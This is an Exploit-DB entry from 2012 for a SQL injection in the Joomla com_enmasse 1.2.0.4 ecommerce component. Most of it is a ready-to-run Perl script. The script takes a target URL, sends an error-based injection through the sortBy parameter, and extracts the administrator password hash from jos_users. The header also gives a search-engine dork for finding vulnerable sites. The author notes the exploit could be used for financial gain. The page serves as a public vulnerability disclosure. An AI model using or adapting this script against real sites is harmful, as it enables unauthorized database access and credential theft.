Joomla! Component com_enmasse 1.2.0.4 - SQL Injection

EDB-ID:

20343

CVE:


EDB Verified:

Author:

D4NB4R

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-08-08

Vulnerable App: 
       

        # Exploit Title: Joomla com_enmasse Remote Exploit

               # Author: Daniel Barragan "D4NB4R"


# Español

# hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra 
# de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es 
# posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por 
# defecto de joomla.

# English

# hi, this exploit affects ecommerce sites so the exploit only give a sample of the 
# possible extraction of data, I am not responsible for any use that is given. since 
# it is possible to obtain economic profit through this. the script is done with joomla default tables.



#!/usr/bin/perl -w

########################################
# Exploit Title: Joomla com_enmasse Remote Exploit
#
# Dork: inurl:index.php?option=com_enmasse
#
# Date: [06-08-2012]
# 
# Author: Daniel Barragan "D4NB4R"
# 
# Twitter: @D4NB4R
# 
# site: http://poisonsecurity.wordpress.com/
# 
# Vendor: http://www.matamko.com/
# 
# Version: 1.2.0.4 (last update on Jul 27, 2012)
# 
# License: Enmasse 6 Months Support & Subscription -  USD$358.20
#
# Demo: http://www.matamko.com/products/filexpress/live-demo.html
#  
# Tested on: [Linux(bt5)-Windows(7ultimate)]
#
# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc.... 
########################################

print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t        Joomla com_enmasse Remote Exploit \n";
print "\t\n\n";

use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

$concatene="concat(password)";
$table="jos_users";
$d4nb4r="floor";
$com="com_enmasse";
$seleccione="select";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/)  {

print "\n Hash Admin : $1\n\n";
print " El exploit fue exitoso si desea ver mas datos modifique el script\n";
print " The exploit was successful if you want to see more data modify the script\n";

}
else{print "\n[-] No se pudo, intente manualmente\n";}

#####Daniel Barragan D4NB4R 2012################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services